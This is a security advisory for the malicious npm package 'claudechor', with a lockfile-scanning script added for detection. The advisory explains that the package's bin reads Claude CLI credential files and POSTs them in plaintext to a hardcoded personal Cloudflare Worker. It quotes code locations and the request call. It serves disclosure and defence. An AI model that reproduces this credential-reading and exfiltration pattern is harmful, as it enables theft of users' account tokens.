Malicious package

claudechor (npm)

Malicious code in claudechor (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5717
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall claudechor

What this malware does

The package's bin entry reads installer-owned Claude credential files (~/.claude/.credentials.json and ~/.claude.json) — written by Anthropic's official Claude CLI, not by this package — and POSTs their contents in plaintext JSON to a hardcoded endpoint https://tfer.jha-anurag2017.workers.dev (a personal Cloudflare Worker unrelated to Anthropic). index.js:9 hardcodes WORKER_URL; index.js:78-83 reads the two credential files and calls request("POST", "/${name}", { data: JSON.stringify(files) }) keyed by <hostname>-<username> (collected via os.hostname() / os.userInfo() at index.js:146). The default invocation claudechor with no arguments runs cmdPush immediately, with no confirmation. AES-256-GCM encrypt/decrypt helpers are defined in the file but are dead code in the push path, so the OAuth/session tokens leave the host unencrypted at the application layer. The README is effectively empty (# tfer) and nothing in the package metadata discloses that the bin uploads third-party credentials to a personal endpoint. Anyone who runs the CLI surrenders their Anthropic account access to the package author.

Malicious versions

5 flagged
1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5
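To check whether a project pulls in any of these versions, including as a transitive or aliased dependency, the following added example (not code from the package or from this advisory's publisher) walks a parsed npm lockfile in either the v1 or the v2/v3 layout. The sample lockfiles and the names demo-app, some-tool and cc-alias are constructed for illustration.

```javascript
// Added example (not from the advisory): locate claudechor in a parsed npm lockfile.
// Real use: findClaudechor(JSON.parse(fs.readFileSync("package-lock.json", "utf8")))
const NAME = "claudechor";
const FLAGGED = new Set(["1.0.1", "1.0.2", "1.0.3", "1.0.4", "1.0.5"]); // versions listed on this page

function findClaudechor(lock) {
  const hits = [];
  const record = (path, version) =>
    hits.push({ path, version, flagged: FLAGGED.has(version) });

  if (lock.packages) {
    // lockfileVersion 2/3: flat map keyed by install path; "name" is set when
    // the folder name differs from the package name (npm alias installs).
    for (const [path, meta] of Object.entries(lock.packages)) {
      const name = meta.name || path.split("node_modules/").pop();
      if (path !== "" && name === NAME) record(path, meta.version);
    }
  } else {
    // lockfileVersion 1: nested "dependencies" tree; walk it recursively.
    const walk = (deps, trail) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        const path = [...trail, name].join(" > ");
        if (name === NAME) record(path, meta.version);
        walk(meta.dependencies, [...trail, name]);
      }
    };
    walk(lock.dependencies, []);
  }
  return hits;
}

// Constructed sample lockfiles (hypothetical project and parent package names).
const sampleV3 = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "0.1.0" },
    "node_modules/left-pad": { version: "1.3.0" },
    "node_modules/some-tool/node_modules/claudechor": { version: "1.0.3" },
    "node_modules/cc-alias": { name: "claudechor", version: "1.0.5" },
  },
};
const sampleV1 = {
  lockfileVersion: 1,
  dependencies: {
    "some-tool": { version: "2.0.0", dependencies: { claudechor: { version: "1.0.1" } } },
  },
};

for (const hit of [...findClaudechor(sampleV3), ...findClaudechor(sampleV1)]) {
  console.log(`${hit.flagged ? "FLAGGED" : "present"} ${NAME}@${hit.version} at ${hit.path}`);
}
```

Any hit means the bin may have been run on that host, so treat the Claude credential files named above as exposed and rotate them.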

Indicators of compromise (SHA-256)


Frequently asked questions

No. claudechor on npm has been identified as a malicious package (versions 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006242, IN-MAL-2026-006241, IN-MAL-2026-006240, IN-MAL-2026-006238, IN-MAL-2026-006239

Credits

  • Amazon Inspector · finder
